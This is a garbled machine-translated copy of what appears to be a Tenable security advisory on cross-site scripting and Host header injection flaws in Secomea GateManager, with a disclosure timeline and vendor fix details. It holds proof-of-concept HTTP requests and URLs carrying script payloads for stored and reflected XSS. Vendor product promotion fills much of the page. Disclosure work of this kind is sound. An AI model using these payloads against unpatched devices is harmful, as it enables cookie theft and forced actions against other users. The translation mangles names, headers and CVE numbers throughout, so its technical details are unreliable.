脸书 Google+ 微博 LinkedIn YouTube系统 RSS系统 菜单类 搜索 资源-博客 资源-Webinar 资源-报表 资源-事件 图标#066 图标_067 图标_068 图标_069 图标070

secomea门管理多功能

中度

简表

可租户发现塞科马门管理器多漏洞塞科梅亚建议我们“期望这些漏洞会波及塞科梅亚所有供销商。”依目前所知,清单中包括B&R工业自动化GmbH

CVE-2020-29021文件存储跨线程

CVSSv3基准分数3.8
sv3向量:AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N

拥有行政权限的用户可上传文件到所有用户都可访问的/pub/目录文件扩展没有限制,也没有禁止HTML或javascript制作

拥有服务器操作符权限攻击者可以通过向定制页注入恶意javascript来利用这个问题,当浏览时,该定制页可窃取其他用户cookie并迫使用户在不知情的情况下采取行动。

概念证明

发送下文请求后, spub/test.html页面完成后, 浏览器中将执行javascript

POST /admin/cgi/QTWhxhnPv.c6Ff8ZS-KxZH0IkpDojTv0Cb4eHk36FlBfz0YF/gui.cgi HTTP/1.1 Host: 192.168.0.186 User-Agent: Mozilla/5.0 (X11!inuxx8664rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data!boundary=---------------------------40815894029540187303449136273 Content-Length: 1205 Origin: https://192.168.0.186 Connection: close Referer: https://192.168.0.186/admin Upgrade-Insecure-Requests: 1 -----------------------------40815894029540187303449136273 Content-Disposition: form-data!name="op" save_file -----------------------------40815894029540187303449136273 Content-Disposition: form-data!name="ftype" public -----------------------------40815894029540187303449136273 Content-Disposition: form-data!name="fname" test.tar -----------------------------40815894029540187303449136273 Content-Disposition: form-data!name="MAX_FILE_SIZE" 268435456 -----------------------------40815894029540187303449136273 Content-Disposition: form-data!name="subdir" -----------------------------40815894029540187303449136273 Content-Disposition: form-data!名称表示文件filename="test.tar" Content-Type: application/x-tar-----------------------------40815894029540187303449136273 Content-Disposition: form-data!name="altname" test.html -----------------------------40815894029540187303449136273 Content-Disposition: form-data!name="comment" -----------------------------40815894029540187303449136273 Content-Disposition: form-data!name="save_public" Upload -----------------------------40815894029540187303449136273--

注意: 您需要修改目标IP地址和cookie值

CVE-2020-29021:通过创建局部术语存储跨线程

CVSSv3基准分数3.8
sv3向量:AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N

更新文件使用条件时,没有输入验证,并有可能输入任意javascript代码,当任何人查看文档时会生成

拥有服务器运算符权限攻击者可能利用这个问题,将恶意javascript插入网页“用户术语”,当浏览时可窃取其他用户cookie并迫使用户在不知情的情况下采取行动

概念证明

发送下文请求后, spub/test.html页面完成后, 浏览器中将执行javascript

POST /admin/cgi/QTWhxhnPv.c6Ff8ZS-KxZH0IkpDojTv0Cb4eHk36FlBfz0YF/gui.cgi HTTP/1.1 Host: 192.168.0.186 User-Agent: Mozilla/5.0 (X11!inuxx8664Gecko20100101Firefox/78.0接受文本/htmlq=0.01验收编码:en-USen;q=0.5验收编码:gzip,deflate内容-Type:application/x-www-form-urlecharset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 114 Origin: https://192.168.0.186 Connection: close Referer: https://192.168.0.186/admin FORMDATA=op=save_terms&subix=&config=%3Cscript%3Ealert('stored+xss')%3C%2Fscript%3E&ver=1&lang=en&language=English

注意: 您需要修改目标IP地址和cookie值

CVE-2020-29021:Qui.cgi反射跨线程预览_Text

CVSSv3基准分数6.3
sv3向量:AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L

view_Text参数在gui.cgi上反射回响应而不净化JavaScript任意代码有可能注入用户浏览器中执行并上载编译URL

概念证明

页面由下URL提供时 JavaScript执行,结果显示消息'反射xs'

https://192.168.0.186/lm/cgi/gui.cgi?op=preview_terms&text=%3Cscript%3Ealert(%27reflected+xss%27)%3C/script%3E

注意IP地址需要修改以匹配目标

CVE-2020-2902:HTTP宿头注入

CVSSv3基准分数4.3
sv3向量:AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

目标易受HTTP主头注入,该注入由主头验证不当引起

漏洞可能被网络缓存中毒所利用需要攻击者毒化缓存代理程序,例如CDN可能导致受害人被迫接收恶意内容-包括编程主机头

请求/回复显示为向受害人提供服务的例子可以看到有数个链路由 enable.com组成如果受害人点击这些链接中的任何链接,他们将被指向离预定网站远至潜在恶意网站

概念证明

复制此题时, 发下请求到目标后会从响应DOM中看到数个连接dable.com域

Get/HTTP/1.1主机:可租性.com缓存接受编码gzipwin64AppleWebKit/537.36(KHTML像Gecko) Chrome/87.280.66Safari/537.36连接:Cache-Control:最大值=0

示例输出

求解

GM8250发布9.3详情见Secomea咨询页塞科梅亚还添加了9.3版通用XSS保护机制Please see https://kb.secomea.com/helpdesk/KB/View/32429348-restrict-use-of-special-characters for details.

披露时间线

12/08/2020-可租发送漏洞报告B&R90天日期为2021年3月8日
12/08/2020-B&R请求公钥
12/09/2020-可租用公共密钥
12/09/2020-B&R感谢我们的报告开始脆弱处理过程 并更新
12/09/2020-可接受感恩B&R
12/15/2020-Secomea联系感谢我们笔试他们的产品 并承认过程和最后期限提供一些修复细节
12/16/2020-可开机B&R
12/17/2020-B&R建议我们与Secomea通话
12/17/2020-可租房Secomea请求澄清
12/17/2020-B&R还请求Secomea澄清请求协调发布活动 以便我们同时发布
12/17/2020-可租重写披露策略
12/18/2020-Secomea发送消息
12/18/2020-B&R响应Secomea消息等待修复后发布咨询
12/18/2020-可开机向Secomea重发消息无法读取
12/18/2020-Secomea发送CVE任务细节、受影响的模型/版本、协调请求
12/18/2020-可信请求澄清受影响商家、模型和版本国家意图发布

TRA建议内所有信息均提供“原封不动”,不提供任何保理,包括隐含可交易性和适切性保证用于特定目的,不保证完整性、准确性或及时性个人和组织负责评估实际或潜在安全漏洞的影响

可租制非常严肃地对待产品安全if you believe你发现我们产品中的脆弱点, 我们请求你与我们合作 快速解决它以保护客户可点信快速响应报告,与研究人员保持通信并快速提供解决方案

关于提交脆弱资料的更多细节,请见我们漏洞报告指南页码

如有问题或更正,请发邮件[email protected]

风险信息

可租咨询ID
TRA-2020-70
信用

德里塞顿

sv3基础/时间评分
6.3/5.7
CVSSv3向量
AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L
受影响产品
全部前9.3门管理器8250全门管理器4250/4260/9250
风险因子
中度

咨询时间线

12/18/2020-咨询发布
12/21/2020-校正 PoC
01/08/2021-加一反射XSS添加相关引用更新解决方案

可耐受脆弱性管理

前称Tenable.io


完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产

可租易容性管理实验中也包括可租可租Lumin、可租WebApp扫描和可租云安全

可耐受脆弱性管理

前称Tenable.io

完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产购买你年度订阅今天

65码资产类

选择订阅选项 :

立即购买

试可穿Nessus专业免费

免费7天

TenableNessus是当今市场最全面的脆弱感扫描器

New-Nessus专家
现可用

奈苏斯专家增加更多特征,包括外部攻击表面扫描能力以及添加域和扫描云基础设施能力点击这里尝试Nessus专家

填表后继续使用NessusPro测试

可买Nessus专业

TenableNessus是当今市场最全面的脆弱感扫描器可租Nessus专业程序帮助脆弱性扫描自动化,在守法周期中省时并允许你加入IT团队

购买多年度许可证并保存添加高级支持访问电话、社区聊天支持全天365天全天24小时

选择您的许可

购买多年度许可证并保存

添加支持培训

tenable.io

完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产

可租易容性管理实验中也包括可租可租Lumin、可租WebApp扫描和可租云安全

tenable.io 付费

完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产购买你年度订阅今天

65码资产类

选择订阅选项 :

立即购买

可租WebApp扫描试

前称Tenable.ioWeb应用扫描

完全存取最新网络应用扫描服务 设计现代应用安全扫描全在线组合漏洞高精度而不人工重创或干扰关键网络应用现在就签名

可租WebApp扫描实验中也包括可租易用性管理、可租可租鲁明和可租云安全

可租WebApp扫描

前称Tenable.ioWeb应用扫描

完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产购买你年度订阅今天

5 FQDNs

3 578美元

立即购买

试可腾鲁明

可视化并探索接触管理,跟踪随时间推移降低风险,并参照Tenablelumin对等基准

可点Lumin测试中也包括可点易点管理、可点WebApp扫描和可点云安全

可买路明

联系销售代表,看可租Lumin如何帮助你在整个组织中获取洞察力并管理网络风险

试可耐云安全

前称可租.cs

完全无障碍检测并修复云基础设施误配置并观察运行时漏洞注册免费测试了解更多试验过程点击这里

可租云安全测试中也包括可租易用性管理、可租可租鲁明和可租WebApp扫描

联系人a购买可租云安全

联系销售代表了解更多可耐云安全知识,并观察多易登录云账号并在分钟内为云误配置和漏洞获取可见度

试可耐奈苏斯专家免费

免费7天

内苏斯专家为现代攻击面搭建,使你能够看到更多并保护组织从IT到云的漏洞

已经有TenableNessus专业
升级Nessus专家免费7天

买可租Nessus专家

内苏斯专家为现代攻击面搭建,使你能够看到更多并保护组织从IT到云的漏洞

选择您的许可

购买多年度许可证并存更多

添加支持培训

试Nessus免费专家

免费7天

内苏斯专家为现代攻击面搭建,使你能够看到更多并保护组织从IT到云的漏洞

内索斯职业类
升级Nessus专家免费7天

买可租Nessus专家

内苏斯专家为现代攻击面搭建,使你能够看到更多并保护组织从IT到云的漏洞

选择您的许可

购买多年度许可证并存更多

添加支持培训

Baidu
map